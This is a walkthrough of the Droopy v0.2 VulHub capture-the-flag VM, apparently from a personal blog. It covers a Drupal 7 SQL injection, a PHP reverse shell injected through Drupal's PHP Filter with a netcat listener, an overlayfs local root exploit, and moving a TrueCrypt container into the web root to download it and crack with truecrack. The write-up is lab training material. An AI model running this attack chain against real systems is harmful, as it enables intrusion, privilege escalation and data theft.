To get started visit the Droopy v0.2 VulHub page hereAnd download a copy of the VM here

The only 2 hints you’ll get are:

1.) Grab a copy of the rockyou wordlist.
2.) It’s fun to read other people’s email.

Special thanks go out to knightmare for all their work on this VM

Now first things first – start up the Droopy VM and if all goes to plan it should pick up a local IP from your DHCP server. In my case this will be in the 192.168.1.0/24 range

There’s lots of different methods to scan your network and pick up hosts.. some are better than others as far as stealth goes, but in my case I stuck to the reliable Swiss army knife nmap and just did a basic ping scan

Right, now that we know our target.. what to do next? Enumerate of course! Back to nmap and we can do a quick check of what ports are open and what services are running on this specific host. Again there’s lots of options and it’s always good to read all the walkthroughs to get an insight as to how others approach each hurdle.

Given that port 80 is open, a quick look at http://192.168.1.82 shows us a logon page. Reviewing our nmap enumeration, we see a file called CHANGELOG.txt which could be interesting and after a quick review we can make an assumption that the web server is running “Drupal 7.30, 2014-07-24”

NOTE – It’s worth a mention that I did try brute forcing the logon at this point with no success – within a minute my IP was locked out. I’m not sure how long for as I just reverted the VM and went back to work

So this is good. We have a definite starting point in which to base our attack. Now comes the essential part – more research.

A quick search on https://exploit-db.com for Drupal 7 reveals a potential SQL Injection vector. Lets give it a try..

If all goes well, we should now have a new Drupal account on the server and receive confirmation similar to the screenshot below.

So where to next? At this point it’s a good idea to reward yourself with a cold beer, but don’t get too carried away, this journey has only just begun. Next step is to log on with our newly created magical credentials and see what our options may be. In my case I have never used Drupal before so it’s a good time to explore and get used to the lay of the land.

After a bit of casual strolling through the various settings I noticed a module called ‘PHP Filter’. The description reads ‘Allows embedded PHP code/snippets to be evaluated’. I’m pretty new to this, but that doesn’t sound like a good thing..

I enabled the PHP filter, Saved Configuration and then and gave my newly created account rights through the permissions link, making sure to click Save Permissions before I continue. Then I created a new post using setting the type as PHP and pasting the reverse shell code from http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Remember to change the following settings on lines 49 and 50 of this particular reverse shell to your attacking machine

$ip = ‘127.0.0.1’; // CHANGE THIS$port = 1234; // CHANGE THIS

Then set up a netcat listener on your attacking machine with

# nc –nlvp 4747

Now fingers crossed, post or preview your update making sure to set the Text Format type to ‘PHP code’ and if the code is good you should see the following connection back to your attacking machine – we have a shell! It’s okay in this scenario, but keep in mind outbound firewalling (aka egress filtering) as this may prevent your reverse shell connection reaching you. Pick a port that’s allowed through Firewall where possible.

I’ll do a separate post of Linux Post Exploitation commands, but in this case we’ll do a quick check of our current account with the idcommand

$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)

In this case I can see that the user name of the owner of the current session is www-data. And while I’m here I do a quick check of the kernel, hardware, etc with

$ uname -a

So this is good isn’t it? We have a shell on the target machine, but we need more! We need to escalate our privileges and make sure we’re at the sharp end of the stick. So where do we go from here?

Before continuing I did a quick browse through the system, and based on the original VM clue “It’s fun to read other peoples email” the /var/mail/ directory caught my attention. So I took a quick peek at the contained file and made some notes

$ ls /var/mail$ cat /var/mail/www-data

The two observations that I took away from it were:

The password isn’t longer than 11 characters

We know what academy we went to

Based on this I decided to create a custom wordlist from any entries containing the word ‘academy’ BUT I screwed up and didn’t notice my mistake… I basically ran the following

$ cat rockyou.txt |grep acadamy >> daves_rockyou.txt

And that was my downfall. A serious lack of attention to detail, and that’s always going to be your (my) downfall in this game. Long story short, when It came time to try and bruteforce the TrueCrypt container.. it failed. My custom world list was based on ‘acadamy’ and what I should have typed was ‘academy’ – So there’s a lesson learnt there. But anyway back to the here and now – I have some clues to work with from the email message in www-data but i’m still not root, so lets move this along.

I needed to get back on track and get my bearings. First step for me is to check what the target is running and obtain the kernel version.

$ uname -r3.13.0-43-generic

The resulting output in this case can be interpreted as follows:

3 – Kernel Version13 – Major Revision43 – Minor Revision

To establish what distro is running on the target machine I ran the following

$ cat /etc/issueUbuntu 14.04.1 LTS \n \l

A quick search on www.exploit-db.com quickly turns up a few options to explore, but the one chosen this time is the overlayfs Local Root Exploit full details and code are at https://www.exploit-db.com/exploits/37292/

Next I right click and copy the source link to download the exploit, then on the target machine run the following (first attempt failed due to lack of permission to write – changed into TMP directory and re-ran.. much better). Then used gcc (GNU Compiler Collection) to compile the source code for execution

Bingo – that’s what we needed. We now have root on the target machine, but this roller coaster’s still moving so there’s no time to celebrate just yet. There’s more work to be done.

A quick peek in the /root folder shows a lonesome file called dave.tc and a quick google shows this to be a TrueCrypt virtual encrypted disk (container), so I decide to download it to my Kali box for further analysis. To do this I chose to move it into a web accessible directory and then just download it straight from a browser – Note, I should have used cp (copy) instead of mv (move) to avoid ‘detection’.

# mv dave.tc /var/www/html/dave.tc

Thne in a browser I opened http://192.168.1.82/dave.tc to download the file

Now on my Kali box and feeling exceedingly confident I ran TrueCrack (a bruteforce password cracker for Truecrypt volumes) against the dave.tc container using my previously created custom wordlist.

# truecrack -t dave.tc -k sha512 -w daves_rockyou.txt

And you guessed it. It failed.. oh dear. At this point I should have checked and picked up on the spelling mistake, but I didn’t. So confused but not defeated I moved on to the other clue that the password wasn’t longer than 11 characters. I had another crack at it, this time generating a new list which only contained passwords 11 characters long to minimise processing time and crossed my fingers

My own fault but I had to leave this to run overnight – yeah I’ve got a slow machine, but when I woke up in the morning with a fresh cup of coffee in hand, the password was smiling sweetly back at me – etonacademy

Now we have the password for the TrueCrypt container we need to mount it and see what we can find.

Now this is where I have to apologise, the following steps worked for me, but being new to Linux i’m not sure this is the best way.. I’ll look more into it, but from here I made a new directory called /mnt/dave (the same name I gave in the cryptsetup process) in which to mount the volume. Then ran the mount command.

First glance returns very little in the listed 3 directories, two small images, but don’t seem suspicious (just yet) so before I waste too much time with Stenography I’ll do some more digging.

Ahh.. So I was just running ls -a in the /mnt/dave/buller folder with no luck, then I ran it back in the /mnt/dave folder and just found a hair in my milkshake!!. something I should have checked the first time around (mental note for future).

So this in interesting and unexpected, we have a new folder called .secret so lets do some more digging.. You wont catch me out twice.. This time I did another ls -la and There’s two folders, one of them hidden again

BOOM! It’s party pizza time. I was just about to start grabbing all the images out of this encrypted volume in preparation for further analysis, but there was no need.. and I wont upload them here. I just took a look inside the /mnt/dave/.secret/.top folder and what do you know – flag.txt

Well that feels good.. big shout out to the boys and girls at www.top-hat-sec.com – If you ever want to learn from passionate like minded people, this is the place to be. No rest for the wicked, time for a quick beer then on to the next VM